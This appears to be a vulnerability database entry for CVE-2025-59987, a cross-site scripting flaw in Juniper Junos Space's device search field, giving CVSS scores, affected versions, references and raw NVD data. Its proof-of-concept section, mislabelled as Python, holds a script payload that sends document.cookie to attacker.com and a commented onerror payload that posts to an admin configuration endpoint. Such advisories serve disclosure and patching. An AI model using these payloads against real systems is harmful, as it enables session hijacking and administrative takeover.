CVE-2025-59987

Description

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the arbitrary device search field that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator.This issue affects all versions of Junos Space before 24.1R4.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:juniper:junos_space:24.1:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:juniper:junos_space:24.1:r2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:juniper:junos_space:24.1:r3:*:*:*:*:*:* - VULNERABLE

Juniper Networks Junos Space < 24.1R4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-59987 PoC - Reflected XSS in Juniper Junos Space Device Search Field -->
<!-- This PoC demonstrates the XSS vulnerability in the device search functionality -->

<!-- Step 1: Craft a malicious URL with JavaScript payload in the search parameter -->
<!-- The search field fails to sanitize HTML/JS tags, allowing script injection -->

<script>
// Simulated exploitation payload
// In a real scenario, this would be injected via the search field parameter
var maliciousPayload = '<script>alert("XSS - Session Hijacked: " + document.cookie)<\/script>';

// Example of how the payload would be delivered via URL
var targetUrl = 'https://junos-space-target/search?device=' + 
    encodeURIComponent('<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>');

console.log('Malicious URL: ' + targetUrl);
console.log('Payload: ' + maliciousPayload);

// When admin clicks the link, the script executes in their browser context
// and exfiltrates session cookies to the attacker's server
</script>

<!-- Alternative payload for stealing admin credentials or performing CSRF -->
<!-- <img src=x onerror="fetch('/api/admin/config',{method:'POST',body:JSON.stringify({action:'modify',target:'all'}),credentials:'include'})"> -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59987
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59987
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59987/
[4] VulDB https://vuldb.com/cve/CVE-2025-59987
[5] https://supportportal.juniper.net/JSA103140

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59987", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:00.617", "lastModified": "2026-01-23T19:59:52.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the arbitrary device search field that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator.This issue affects all versions of Junos Space before 24.1R4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "2EC090A9-634B-4AA2-916F-7548AF71FF76"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "0566970C-0E9B-4566-9920-C7C436A4243D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "A2AA399D-5A7D-45B8-B774-D69054DFA4D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "57CC4E1A-23AA-4B4A-8690-5EEDCBEC4BBE"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103140", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}